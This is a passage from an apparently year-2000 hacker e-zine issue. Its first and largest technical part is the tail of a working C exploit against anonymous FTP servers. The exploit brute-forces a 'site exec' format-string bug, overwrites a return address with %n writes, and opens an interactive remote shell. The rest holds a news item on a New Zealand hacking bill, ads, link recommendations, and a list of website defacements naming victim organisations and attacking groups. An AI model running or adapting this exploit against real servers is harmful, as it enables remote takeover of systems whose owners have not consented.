      memset(mbuf, 0, BIGBUF);
      
      if(debug) getchar();
      
      } while(opt);
      
      opt=1;
      }
      printf("Eat OK: %i\n", eat);
      
      printf("3. Calculating align...\n");
      
      if(debug) getchar();
      
      if(argc>=4) { sscanf(argv[3], "%i", &alin); }
              else { alin=ALIN; }
      
      if(force) {
      alin--;        
      
      do {
      alin++;
      
      toeip=0x31313131;
      
      mkcode1();
      
      mkalin();
      
      send(sock,buf,strlen(buf),0);
      
      c=recv(sock, mbuf, sizeof(mbuf), 0);
      if(debug) puts(mbuf);
      str=strchr(mbuf,'|');
      if(str==0) {
              printf("Unable to complete search!\n");
              exit(-1); }
      str[9]='\x00';
      
      printf("Using align: %i\n", alin);
      printf("<%s>\n\n",str);
      
      if(!(strncmp(str,"|31313131",9))) {
      	opt=0; }
      
      memset(mbuf, 0, BIGBUF);
      
      c=recv(sock, mbuf, sizeof(mbuf), 0);
      if(debug) puts(mbuf);
      memset(mbuf, 0, BIGBUF);
      
      if(debug) getchar();
      
      } while(opt);
      
      opt=1;
      
      toeip=TOEIP;
      }
      printf("Align OK: %i\n", alin);
      
      printf("4. Calculating inital length...\n");
      
      if(debug) getchar();
      
      if(argc>=2) { sscanf(argv[1], "%x", &toeip); }
      	else { toeip=TOEIP; }
      
      if(force) {
      mkcode1();
      
      mkini();  
         
      send(sock,buf,strlen(buf),0);
      
      c=recv(sock, mbuf, sizeof(mbuf), 0);
      if(debug) puts(mbuf);
      str=strchr(mbuf,'|');
      if(str==0) {
              printf("Unable to complete search!\n");
              exit(-1); }
      inicio=str - mbuf - 4;
      memset(mbuf, 0, BIGBUF);
      
      c=recv(sock, mbuf, sizeof(mbuf), 0);
      if(debug) puts(mbuf);
      memset(mbuf, 0, BIGBUF);
      
      if(debug) getchar();
      }
      printf("Start OK: %x\n", inicio);
      
      // It search in the remote memory!! wow!! :)
      
      printf("5. Searching for shellcode\n");
      
      if(debug) getchar();
      
      if(argc>=5) { sscanf(argv[4], "%x", &retn); }
              else { retn=RETN; }
      
      if(force) {
      retn-=0x40;
              
      do {
      retn+=0x40;
      
      toeip=retn;
      
      mkcode1();
      
      mksh();
      
      send(sock,buf,strlen(buf),0);
      
      c=recv(sock, mbuf, sizeof(mbuf), 0);
      if(debug) puts(mbuf);
      str=strchr(mbuf,'|');
      if(str==0) {
      	printf("Unable to complete search!\n");
      	exit(-1); }
      str[5]='\x00';
      
      printf("Using ret: %x\n", retn);
      printf("<%s>\n\n",str);
      
      if(!(strncmp(str,"|AAAA",5))) {
      	opt=0; }
      
      memset(mbuf, 0, BIGBUF);
      
      c=recv(sock, mbuf, sizeof(mbuf), 0);
      if(debug) puts(mbuf);
      memset(mbuf, 0, BIGBUF);
      
      if(debug) getchar();
      
      } while(opt);
      
      opt=1;
      }
      printf("Address of the shellcode OK: %x\n", retn);
      
      printf("6. Sending attack...\n");
      
      if(argc>=2) { sscanf(argv[1], "%x", &toeip); }
       	else { toeip=TOEIP; }
      
      status();
      
      if(debug) getchar();
      
      do {
      printf("Using Offset: %x\n", toeip);
      
      mkcode1();
      
      mkbuf();
      
      send(sock,buf,strlen(buf),0);
      
      printf("Waiting for shell...\n\n");
      
      term();
      
      printf("Logged out...\n");
      
      if(debug) getchar();
      
      printf("Reconecting...\n");
      
      if(debug) getchar();
      close(sock);
      fflush(stdout);
      conectar(argv[0]);
      
      } while(opt);
      
      printf("Ending...");
      if(debug) getchar();
      close(sock);
      fflush(stdout);
      exit(0);
      }
      
      void conectar(char *host) {
      char cbuf[BUFLEN];
      int c;
      
      memset(cbuf, 0, BUFLEN);
      
      if((hp=(struct hostent *)gethostbyname(host))==NULL) {
      	perror("gethostbyname()");
      	exit(0); }
      
      if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
              perror("socket()");
              exit(0); }
      
      sa.sin_family=AF_INET;
      sa.sin_port=htons(21);
      
      memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
      
      if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
      	perror("connect()");
              exit(0); }
      
      printf("Connected to %s\n",host);
      
      printf("Reading...\n");
      
      c=recv(sock, cbuf, sizeof(cbuf), 0);  
      if(debug) puts(cbuf);
        
      if((strncmp(cbuf, "220 ", 4))==0) { memset(cbuf, 0, BUFLEN); }
      	else {
      	if((strncmp(cbuf, "220-", 4))==0) {
      		memset(cbuf, 0, BUFLEN);
      		c=recv(sock, cbuf, sizeof(cbuf), 0);
      		if(debug) puts(cbuf);
      		memset(cbuf, 0, BUFLEN); }
      	else {	 
      		printf("Wrong ftp server\n");
      		exit(-1); }
      	}                                                          
      
        	                        
      printf(">> user ftp\n");
      sprintf(cbuf,"user ftp\n");
      write(sock,cbuf,strlen(cbuf));
        
      c=recv(sock, cbuf, sizeof(cbuf), 0);
      if(debug) puts(cbuf);
        
      if(strncmp(cbuf, "331", 3)) {
      	printf("Anonymous ftp not allowed\n");
      	exit(-1);
      	}                                                         
      
      memset(cbuf, 0, BUFLEN);
        
      printf(">> pass %s@mail.com\n", code2);
      sprintf(cbuf,"pass %s@mail.com\n", code2);
      write(sock,cbuf,strlen(cbuf));
      
      c=recv(sock, cbuf, sizeof(cbuf), 0);
      if(debug) puts(cbuf);
        
      if((strncmp(cbuf, "230 ", 4))==0) { memset(cbuf, 0, BUFLEN); }
      	else {
      	if((strncmp(cbuf, "230-", 4))==0) {
      		memset(cbuf, 0, BUFLEN);
      		c=recv(sock, cbuf, sizeof(cbuf), 0);
      		if(debug) puts(cbuf);
      		memset(cbuf, 0, BUFLEN); }
      	else {	 
      		printf("Wrong password\n");
      		exit(-1); }
      	}     
      	  
      printf("Logged\n");
      
      }
      
      void term(void) {
      char sbuf[BUFLEN];
      fd_set rfds;
      int x;
      
      sprintf(sbuf, "QUIT\nuname -a; id;\n");
      send(sock, sbuf, strlen(sbuf), 0);                
      
      while (1) {
            FD_ZERO(&rfds);
            FD_SET(0, &rfds);
            FD_SET(sock, &rfds);
            
            if(select((0 > sock ? 0 : sock) + 1, &rfds, NULL, NULL, NULL) < 1)
      	return;
            
            if(FD_ISSET(sock, &rfds)) {
      	  if((x = read(sock, sbuf, sizeof(sbuf))) < 1)
      	    return;
      	    write(0, sbuf, x);	}
      
            if(FD_ISSET(0, &rfds)) {
      	  if((x = read(0, sbuf, sizeof(sbuf))) < 1)
      	    return;
      	    write(sock, sbuf, x); }
            }
      
      }
      
      void mkcode1(void) {
      int i;
      int c;
      
      memset(code1,0x30,40);
      
      i=alin;
      
      for(c=0;c<4;c++) {
      
        code1[i]=(toeip & 0xff);
        if(code1[i]=='\xff') {
        	i++;
        	code1[i]=(toeip & 0xff); }
        i++;
        code1[i]=((toeip & 0xff00) >> 8);
        if(code1[i]=='\xff') {
              i++;
              code1[i]=((toeip & 0xff00) >> 8); }                  
        i++;
        code1[i]=((toeip & 0xff0000) >> 16);
        if(code1[i]=='\xff') {
        	i++;
        	code1[i]=((toeip & 0xff0000) >> 16); }
        i++;
        code1[i]=((toeip & 0xff000000) >> 24);
        if(code1[i]=='\xff') {
        	i++;
        	code1[i]=((toeip & 0xff000000) >> 24); }
      
        i=i+5;
        toeip++;
      
      }
      
      i=i-4;
      code1[i]='\x00';
      
      }
      
      void mkbuf(void) {
      char *ptr = buf;
      int r1, r2, r3, r4;
      int i;
      
      memset(buf, 0, 1024);
        
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr, "site exec ");
      ptr = &buf[strlen(buf)];
      
      for(i=0; i < strlen(code1);i++) {
      	sprintf(ptr,"%c", code1[i]);
      	ptr = &buf[strlen(buf)]; }
              
      for(i=0; i < eat; i++) {
      	sprintf(ptr, "%%.f");
          	ptr = &buf[strlen(buf)]; }  
      
      r1 = (retn & 0xff);
      r1 |= ((inicio & 0xff00) + 0x100);
      sprintf(ptr,"%%.%dd", r1 - inicio);
      ptr = &buf[strlen(buf)];
      sprintf(ptr,"%%n"); 
      ptr = &buf[strlen(buf)];
      
      r2 = (retn & 0xff00) >> 8;
      r2 |= ((inicio & 0xff00) + 0x200);
      sprintf(ptr,"%%.%dd", r2 - r1);
      ptr = &buf[strlen(buf)];
      sprintf(ptr,"%%n");
      ptr = &buf[strlen(buf)];
      
      r3 = (retn & 0xff0000) >> 16;
      r3 |= ((inicio & 0xff00) + 0x300);
      sprintf(ptr,"%%.%dd", r3 - r2);
      ptr = &buf[strlen(buf)];
      sprintf(ptr,"%%n"); 
      ptr = &buf[strlen(buf)];
      
      r4 = (retn & 0xff000000) >> 24;
      r4 |= ((inicio & 0xff00) + 0x400);
      sprintf(ptr,"%%.%dd", r4 - r3);
      ptr = &buf[strlen(buf)];
      sprintf(ptr,"%%n"); 
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr,"%s",code3);
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr,"\n");
      
      }
      
      void mkini(void) {
      char *ptr = buf;
      int i;
      
      memset(buf, 0, 1024);
        
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr, "site exec ");
      ptr = &buf[strlen(buf)];
      
      for(i=0; i < strlen(code1);i++) {
      	sprintf(ptr,"%c", code1[i]);
      	ptr = &buf[strlen(buf)]; }
              
      for(i=0; i < eat; i++) {
      	sprintf(ptr, "%%.f");
          	ptr = &buf[strlen(buf)]; }  
      
      sprintf(ptr,"|");
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr,"%%x-");
      ptr = &buf[strlen(buf)]; 
      	
      sprintf(ptr,"%%x"); 
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr,"\n");
      
      }
      
      void mkalin() {
      char *ptr = buf;
      int i;
      
      memset(buf, 0, 1024);
        
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr, "site exec ");
      ptr = &buf[strlen(buf)];
      
      for(i=0; i < strlen(code1);i++) {
      	sprintf(ptr,"%c", code1[i]);
      	ptr = &buf[strlen(buf)]; }
              
      for(i=0; i < eat; i++) {
      	sprintf(ptr, "%%.f");
          	ptr = &buf[strlen(buf)]; }  
      
      sprintf(ptr,"%%x");
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr,"|");
      ptr = &buf[strlen(buf)];
      	
      sprintf(ptr,"%%x");
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr,"\n");
      
      }
      
      void mksh(void) {
      char *ptr = buf;
      int r1, r2, r3, r4;
      int i;
      
      memset(buf, 0, 1024);
        
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr, "site exec ");
      ptr = &buf[strlen(buf)];
      
      for(i=0; i < strlen(code1);i++) {
      	sprintf(ptr,"%c", code1[i]);
      	ptr = &buf[strlen(buf)]; }
              
      for(i=0; i < eat; i++) {
      	sprintf(ptr, "%%.f");
          	ptr = &buf[strlen(buf)]; }  
      
      r1 = (retn & 0xff);
      r1 |= ((inicio & 0xff00) + 0x100);
      sprintf(ptr,"%%.%dd", r1 - inicio);
      ptr = &buf[strlen(buf)];
      sprintf(ptr,"|%%s"); 
      ptr = &buf[strlen(buf)];
      
      r2 = (retn & 0xff00) >> 8;
      r2 |= ((inicio & 0xff00) + 0x200);
      sprintf(ptr,"%%.%dd", r2 - r1 - 1);
      ptr = &buf[strlen(buf)];
      sprintf(ptr,"%%x");
      ptr = &buf[strlen(buf)];
      
      r3 = (retn & 0xff0000) >> 16;
      r3 |= ((inicio & 0xff00) + 0x300);
      sprintf(ptr,"%%.%dd", r3 - r2 - 1);
      ptr = &buf[strlen(buf)];
      sprintf(ptr,"%%x"); 
      ptr = &buf[strlen(buf)];
      
      r4 = (retn & 0xff000000) >> 24;
      r4 |= ((inicio & 0xff00) + 0x400);
      sprintf(ptr,"%%.%dd", r4 - r3 - 1);
      ptr = &buf[strlen(buf)];
      sprintf(ptr,"%%x"); 
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr,"%s",code3);
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr,"\n");
      
      }
      
      void status(void){
      printf("[ Using values: offset=%x eat=%i align=%i add=%x inicio=%x ]\n",
      toeip, eat, alin, retn, inicio);
      }
      
      // By The Dark Raver      
      
      @HWA
      
349.0 [IND] Nov 2000 : Opposition to New Zealand hacking bill mounts
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.newsbytes.com/news/00/158161.html
      
      By Adam Creed, Newsbytes
      WELLINGTON, NEW ZEALAND, 15 Nov 2000, 12:23 AM CST

      The New Zealand Greens political party has voiced its opposition to a 
      planned amendment to the country's  crime bill that could allow 
      security services to hack into citizens' computers and intercept e-mail 
      and faxes. 

      The long-awaited legislation is mainly intended to criminalize computer 
      hacking in New Zealand. The country has been without specific 
      legislation outlawing malicious hacking. 

      While supporting the main thrust of the planned laws, the Greens do not 
      want to support a law that also gives  the police and security 
      services the right to hack into computers and intercept e-mail and faxes. 

      "We won't support interception powers for state agencies, which in the 
      electronic area would be a considerable assault on people's 
      privacy," said a Greens spokesperson, adding that such new powers would be 
      much more open to abuse. 

      "There are serious doubts that such interception would do much to catch 
      criminals," he added. "Real villains can easily avoid detection 
      through using disguised language, encryption, temporary Hotmail addresses, 
      rerouters and unlisted mobile phones. Therefore the cost to public privacy 
      might greatly outweigh the beneficial effect of catching more criminals." 

      He said that "misuse" of the world-wide Echelon interception network 
      already illustrated the potential for privacy violations. 

      Information Minister Paul Swain responded to criticism of the proposed 
      laws by calling for elected representatives to pass a motion that 
      would table the amendment first. 

      He said there would be time to debate the proposed laws when the Bill is 
      referred back to Parliament. 

      "However the overarching purpose of this (amendment) is to make hacking 
      illegal in New Zealand  I think that is vital for every New 
      Zealander who owns a computer. We need to send a strong message that 
      hacking is not cool, it is not clever, it is a serious crime," Swain 
      added. 

      Reported By Newsbytes.com, http://www.newsbytes.com . 

      00:23 CST 

      @HWA      
                   
      
999.9 [HWA] sp00ge! The hidden track. (Free stuff, tips and s3kr3t urls and shit)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Here's some cool urls, tips tricks and other shit that doesn't fit elsewhere.           
      
      http://www.phonefree.com/  
           
           - Free calls pc-phone within us and pc-pc worldwide, also video and pay
             extra feature options and offers on hardware (headsets etc) check it.
      
      http://www.dialpad.com/ 
           
           - Free calls pc-phone anywhere us <-> us sign up from anywhere in the
             world (use a US address) and make calls to anywhere in the US so its
             great for foreign users wanting to call US destinations for free over
             the net.. ;)
             
       Not much here, I held back a lot of goodies for the next issue, watch this
       space for 'secret' sites and hints and tip sites. - Ed
       
       @HWA      
             
             
             
                    
                                 
      

AD.S  ADVERTI$ING.       The HWA black market                  ADVERTISEMENT$.
      =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
      

      
               ____  _       _              _   ____       _  __
              | __ )| | __ _| |_ __ _ _ __ | |_/ ___|  ___| |/ _|
              |  _ \| |/ _` | __/ _` | '_ \| __\___ \ / _ \ | |_
              | |_) | | (_| | || (_| | | | | |_ ___) |  __/ |  _|
              |____/|_|\__,_|\__\__,_|_| |_|\__|____/ \___|_|_|
              |  _ \ _ __ ___  _ __ ___   ___ | |_(_) ___  _ __
              | |_) | '__/ _ \| '_ ` _ \ / _ \| __| |/ _ \| '_ \
              |  __/| | | (_) | | | | | | (_) | |_| | (_) | | | |
              |_|   |_|  \___/|_| |_| |_|\___/ \__|_|\___/|_| |_|

      

       
       *~`~*|*~`~*[ promo ur site or peddle  ]*~`~*|*~`~*
                                                                 
          ADVERTISING IS FREE TRY AND BE CREATIVE, HWA RESERVES RIGHT TO
          IGNORE YOUR REQUEST (THIS NEVER HAPPENS) READ BELOW FOR .COMS,
          
          SEND YOUR ADS TO CRUCIPHUX@DOK.ORG
       
       
       *~`~*|*~`~*[    your product...       ]*~`~*|*~`~*
       
       Ads run for ever or until i get sick of looking at them or
       they die or whatever. Commercial advertising is welcome we are
       read by several thousand people each issue, higher than some
       print publications.Payment is required for commercial ads, this
       can be monetary (cheque or money order made out to CASH sent to
       the mail drop listed earlier in the zine) or promo goodies or
       * merchandise, we would also be interested in aquiring sponsors
       to promote and fund a Hacker/Security CON in the Southern Ontario
       Canada area since most cons are south of the border and a 
       Canadian con is LONG overdue. 
       
       * Security/COMSEC/IT Networking/Internet related
       
                                  - cruciphux@dok.org
       
       *~`~*|*~`~*[   suck a sore buck       ]*~`~*|*~`~*
       
       

              "Nice boy, but as sharp as a sack of wet mice."
           
                         -- Foghorn Leghorn
  
                                                   ______               __
      _      ___      ___      __ ______________  / __/ /_  ____  ___  / /_
     | | /| / / | /| / / | /| / // ___/ ___/ __ \/ /_/ __/ / __ \/ _ \/ __/
     | |/ |/ /| |/ |/ /| |/ |/ // /__(__  ) /_/ / __/ /__ / / / /  __/ /_
     |__/|__/ |__/|__/ |__/|__(_)___/____/\____/_/  \__(_)_/ /_/\___/\__/
    
         CUBESOFT COMMUNICATIONS IS A PROUD SPONSOR OF THIS PUBLICATION         
     
    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * **
    *       www.csoft.net webhosting, shell, unlimited hits bandwidth ...    *
    *         www.csoft.net www.csoft.net www.csoft.net www.csoft.net        *
    *                                                                        *
    *                    http://www.csoft.net/                               *
    *                                                                        *
    *             One of our sponsors, visit them now                        *
    *                                                                        * 
    * * * * * * ** * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       
       

    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
    * 2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


        

     @HWA
     
       
              
             
HA.HA Humour and puzzles ...etc
      =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
      
                                                 Don't worry. worry a *lot*
      
      
      
                                   _ _
                               ___(_) |_ ___ ___
                              / __| | __/ _ Y __|
                              \__ \ | ||  __|__ \
                              |___/_|\__\___|___/       
       
       
     SITE.1
     
     -=- Fun =-
     
     http://www.howtoandroid.com/HowToBuildRobotHead.html
     
     Just go look :) ... - Ed
     
     
     
     -=- Hack/Security -=-
     
     http://root66.nl.eu.org
     
     {} (aka Frank)
     
     -=-= Tech/General -=-
     
     http://www.uk.research.att.com/vnc/
     
     Got windows and need remote admin? check this out...non commercial.
     
     
     
     Cool site!, check it out, complete with interactive 'shell' to the
     root66 box...a must see. -  Ed
     
     
     
     http://users.javanet.com/~alden/indexa.html
     
     phluid (phluid@mindless.com)
     
     Just stumbled across this and what a sweet looking site, you have to
     check it out just to dig the layout/graphics. Very nice, content? well
     have a look around, but do check it out ... - Ed
     
     
     http://www.securax.org/
     
     (Belgium/Dutch)
     
     Submitted by: Zoa_Chien
     
     Nice site, well laid out but unfortunately for many of us its not in English
     :( ... check it out all the same, news, exploits, latest file list from
     packetstorm, HNN affiliate etc.. - Ed
     
       
     
     -=- Telephony -=-
     
     http://twpyhr.usuck.com .
     
     Jenny
     
     
     Very interesting site for the telephone enthusiast, has lots of rare and
     entertaining recordings of phone system screwups and general messages/
     announcements etc, worth checking out, also check out the answering 
     machine OGM collection :-) fun stuff. - Ed
     
     -=- Employment/Skill testing -=-
     
     http://www.brainbench.com/
     
     Check out this site, test you sysadmin skills, even get certified online!
     post your stats to an online database and give the url to potential 
     employers etc, lots of services ... a must see. - Ed
     
     
     http://cgisecurity.com/
     
     Fledgling security site dealing with cgi and www vulnerabilities run by
     Zenomorph, very good site, much promise, lots of advisories and info
     well worth a visit if you admin a website. - Ed
     
     
                 
     You can Send in submissions for this section too if you've found 
     (or RUN) a cool site...
       
        
       
      @HWA
       
         
         
  H.W Hacked websites 
      =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
      
      
    ___ ___   _   ___ _  _____ ___  ___ ___ _____ ___ ___ _    ___ ___ _____
   / __| _ \ /_\ / __| |/ / __|   \/ __|_ _|_   _| __/ __| |  |_ _/ __|_   _|
  | (__|   // _ \ (__| ' <| _|| |) \__ \| |  | | | _|\__ \ |__ | |\__ \ | |
   \___|_|_Y_/ \_\___|_|\_\___|___/|___/___| |_| |___|___/____|___|___/ |_|
 
   
                 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
                 |L|4|t|E|S|T|_|W|3|B|_|D|E|F|A|C|E|M|E|N|T|S|
                 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

    
    

      Muse: so where are the hacks with a point? defacing is synonomous with
            teenagers spray bombing urban walls with logos and gang colours
            it seems...what happened to HARP? 
            
            (Enter GForce)
            
          * Hackers Against Racist Propaganda (See issue #7)
          
      [A = Articles accompany mirror]--[M = 'mass' hack]--[C = 'message' in HTML comments]--[K = Free Kevin reference] 
      
                                                                                       (back) November 2000 (forward)
      
      
       Date      OS Group/Person      AMCK Site                              2000
       ~~~~      ~~ ~~~~~~~~~~~~      ~~~~ ~~~~                            ~~~~~~~~
      
      [00.11.13] NT [m0r0n & nightman]     Syscom Computing Ltd (www.syscom.co.il)
      [00.11.13] NT [m0r0n & nightman]     Eshed Robotec Ltd (www.robotec.co.il)
      [00.11.13] NT [m0r0n & nightman]     TAHAL (Tichnun Ha'Main Le'Israeel) (www.tahal.co.il)
      [00.11.13] Lr [hackweiser]           Oskar (HK) (www.oskar.com.hk)
      [00.11.12] So [xessor]               Jokes.com (www.jokes.com)
      [00.11.12] Lr [NiTR8]                The University Of Isfahan (www.ui.ac.ir)
      [00.11.12] NT [Anti Sec. Hackers] C  PhoenixNet Informatica LTDA (www.phoenixnet.com.br)
      [00.11.12] BI [BrainStorm]           Marcel Franke (www.atacsis.de)
      [00.11.12] NT [prime suspectz]       Biblioteca Leo Falicov (cabbib2.cnea.gov.ar)
      [00.11.12] NT [lion/type_o]          Prime Bank, Pakistan (www.primebank.com.pk)
      [00.11.12] 2k [lion/type_o]          Hafeez Centre (www.hafeezcentre.com.pk)
      [00.11.12] NT [tR|cky]               Shavatz High School (www.savatz.givataim.k12.il)
      [00.11.12] Un [McM4nus]              Conseils Delarive Holding (www.conseil-delarive.ch)
      [00.11.12] Bf [Havoc Korp]           Elite Internet Clans (www.eliteclans.com)
      [00.11.12] Lr [hackweiser]           House of Energy (HK) (www.houseofenergy.com.hk)
      [00.11.12] NT [Anti Security]     C  Comercial So Patricio Ltda. (www.bigbox.com.br)
      [00.11.12] NT [Anti Security]     C  Sebrae, Servico Brasileiro de Apoio a Empresa de P (www.ap.sebrae.com.br)
      [00.11.12] Li [prime suspectz]       Governo do Estado de Rondonia (www.jaru.ro.gov.br)
      [00.11.12] IR [the nobodies]      C  Tsinghua University - Center of Atomic and Molecular Sciences (www.cams.tsinghua.edu.cn)
      [00.11.12] NT [Anti Security]     C  Prodemge Cia Proc Dados do Estado de Minas Gerais (www.ief.mg.gov.br)
      [00.11.12] NT [Brake^Off]            Anes Condos and Villas rentals - Playa del Carmen (www.anes-condos.com.mx)
      [00.11.12] 2k [PHC]                  Jared Baker (www.jaredbaker.com)
      [00.11.12] NT [Brake^Off]            Cancun Tours - Xel-Ha (www.xelha.com.mx)
      [00.11.12] NT [prime suspectz]   M   Colorado K12 Schools (primero.k12.co.us)
      [00.11.12] 2k [prime suspectz]       Oficina Central de Estadstica e Informtica (www.ocei.gov.ve)
      [00.11.12] NT [CyberPunk]            New Horizons Baja California (www.newhorizons.com.mx)
      [00.11.12] Ir [dhc]                  New York State Government primary Web site (www.state.ny.us)
      [00.11.12] NT [McM4nus]          M   Maerki, Baumann & Co AG (www.mbczh.ch)
      [00.11.12] 2k [predator]         MC  Warez Exchange (www.warezexchange.net)
      [00.11.12] NT [AntihackerlinK]       Harian Umum Republika (www.republika.co.id)
      [00.11.12] 2k [IHA]                  Miller Imaging Juice Server (juice.millercd.com)
      [00.11.12] NT [m0r0n & nightman]     Sivan-North Computer (www.sivan-north.co.il)
      [00.11.12] NT [m0r0n & nightman]     Lantronics Computer Networking Ltd. (www.lantronics.co.il)
      [00.11.11] NT [McM4nus]              Banco Colpatria (www.banco.colpatria.com.co)
      [00.11.11] NT [prime suspectz]       Inprise (www.inprise.ca)
      [00.11.11] NT [IZ Corp]              Massachusetts Institute of Technology (cliq.mit.edu)
      [00.11.11] NT [prime suspectz]       Proderj - Centro de processamento de Dados do RJ (sintegra.sef.rj.gov.br)
      [00.11.11] NT [prime suspectz]       Borland (CA) (www.borland.ca)
      [00.11.11] NT [xrev]                 Woops Ltda (www.woops.com.br)
      [00.11.11] 2k [prime suspectz]       Home Page do Derba (www.derba.ba.gov.br)
      [00.11.11] NT [eniac]                Museum of Alfons Mucha (www.mucha.cz)
      [00.11.11] Ir [r0b1n h00d slu7]      Quelle (www.quelle.com.cn)
      [00.11.11] NT [McM4nus]              Banco Agricola de El Salvador (www.bancoagricola.com)
      [00.11.11] Li [Crime Boys]           Centro Pastoral, Educacional e Assistencial "Dom Carlos" (www.cpea.br)
      [00.11.11] Lr [fluffy bunny]     M   Knight Networking and Web Design (ww1.knightnetworking.com)
      [00.11.11] Lr [fluffy bunny]     M   Linear Systems, Inc. (lottohost.spiritusa.net)
      [00.11.11] So [Crime Boys]           NETZONE,Co. Ltd (www.netzone.co.kr)
      [00.11.11] NT [frenet1k]             Bradford College (bradford.edu)
      [00.11.11] NT [prime suspectz]       Administracao do Porto de So Francisco do Sul (www1.apsfs.sc.gov.br)
      [00.11.11] NT [m0r0n/nightman]       PC center (www.pc-center.co.il)
      [00.11.11] 2k [AntihackerlinK]       PT. Texmaco Jaya (www.texmaco.co.id)
      [00.11.11] NT [IHA]                  Washington D.C. Department of Employment Services (mail.does.dcgov.org)
      [00.11.11] NT [ReDPriest]        M   Florida State University Center for Professional Development LAB (www.cpdlab.fsu.edu)
      [00.11.11] NT [tR|cky]               Open University - Jerusalem (jccopenu.ac.il)
      [00.11.11] NT [ReDPriest]            UIUC Department of Kinesiology (kines-freer.kines.uiuc.edu)
      [00.11.11] NT [tR|cky]               Zefat Regional College (www.zrc.ac.il)
      [00.10.11] NT [Anti-401 Crew]    M   Outerline (www.outerline.com)
      [00.11.10] NT [ReALiSt]              Infinity Egypt (www.infinity.com.eg)
      [00.11.10] NT [neon-lenz]            Amsterdam Hotels (www.amsterdam-hotels.nl)
      [00.11.10] NT [prime suspectz]       Naval Pacific Meteorology and Oceanography Center, Yokosuka, Japan (www.yoko.npmoc.navy.mil)
      [00.11.10] Ir [prime suspectz]       Ultra Park Estacionamento e Lavarapido Ltda (www.tudofacil.com.br)
      [00.11.10] NT [prime suspectz]       Governo Do Estado Do Mato Grosso (www.pgj.mt.gov.br)
      [00.11.10] NT [philer]               Nichols Dollar Saver (www.nicholsdollarsaver.com)
      [00.11.10] NT [prime suspectz]       US Bureau of Reclamation (www.mp.usbr.gov)
      [00.11.10] So [telconinjas]          Scenewhores (www.scenewhores.net)
      [00.11.10] NT [prime suspectz]       Bernalillo County (www.bernco.gov)
      [00.11.10] NT [philer]               Sprout Communications (www.chiossone.com)
      [00.11.10] NT [prime suspectz]       Governo Do Estado do Mato Grosso (servicos.detran.mt.gov.br)
      [00.11.10] NT [prime suspectz]       Ebay Taiwan/a> (www.ebay.com.tw)
      [00.11.10] IR [Crime Boys]       M   Banco PSA Finance do Brasil S.A (www.bancopsa.com.br)
      [00.11.10] NT [HF]               M   BusinessNet (www.businessnet.com.ar)
      [00.11.10] NT [prime suspectz]       #2 Technical Info, Jet Propulsion Labs (NASA) (techinfo.jpl.nasa.gov)
      [00.11.10] NT [Hackweiser]           Hyundai Information Technology Co., Ltd. (www.hdcorp.hyundai.net)
      [00.11.10] Bf [Ne[r0]                NTV Corp (moped.ntvi.ru)
      [00.11.10] NT [neon-lenz]            Yellow-White (www.yellowwhite.nl)
      [00.11.10] Lr [hackweiser]           Bagz (HK) (www.bagz.com.hk)
      [00.11.10] 2k [tR|cky]               Western-Galilee College (wgalil.ac.il)
      [00.11.09] NT [prime suspectz]       NEC (TW) (www.nec.com.tw)
      [00.11.09] Li [r0b1n h00d slu7]  M   Cooper Consulting (www.cooperconsulting.com)
      [00.11.09] NT [anti security]     C  TV Fronteira Paulista Ltda (www.tvfronteira.com.br)
      [00.11.09] NT [WiNeGuM]              Bray County, Ireland (www.bray.ie)
      [00.11.09] Li [r0b1n h00d slu7]      Bradley Development (www.circlecranch.com)
      [00.11.09] NT [prime suspectz]       Visa International (www.visa.de)
      [00.11.09] NT [prime suspectz]       ASICS Corporation (www.asics.co.jp)
      [00.11.09] Ir [prime suspectz]       Integris (www.integris.com.br)
      [00.11.09] NT [HF]               M   Platao Servicos Graficos Ltda (www.aeroway.com.br)
      [00.11.09] NT [zigfred/hardcore]     Servico Social Do Comercio-Sesc Ar/Rondonia (www.sesc-ro.com.br)
      [00.11.09] 2k [HackersFamily]        Mash industria e comercio Ltda. (www.sabesabe.com.br)
      [00.11.09] NT [r00t.br]              ACS (www.acs.co.il)
      [00.11.09] So [sil0]                 Electra2 (www.electra2.co.uk)
      [00.11.09] NT [m0r0n & nightman]     Interwise Campus (www.interwise-campus.co.il)
      [00.11.09] NT [m0r0n & nightman]     ScanMaster (www.irt.co.il)
      [00.11.09] So [sil0]                 Check Your Credit (www.checkyourcredit.co.uk)
      [00.11.09] NT [m0r0n & nightman]     KIS Technologies (www.kis.co.il)
      [00.11.09] 2k [Reve|at|on]       M   Spattered Ink (spatteredink.com.au)
      [00.11.09] 2k [rapeworm]             Eduk8 (www.eduk8.com.au)
